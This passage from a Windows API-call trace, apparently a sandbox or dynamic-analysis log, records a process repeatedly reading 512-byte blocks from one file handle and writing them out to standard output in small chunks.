lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.367] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.367] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.367] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, 
lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.368] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.368] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 
[0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, 
lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.369] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.369] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.370] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.370] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, 
lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 
| out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.371] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.371] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 
[0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.372] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.373] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 
[0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.374] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.374] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, 
lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.375] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.375] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, 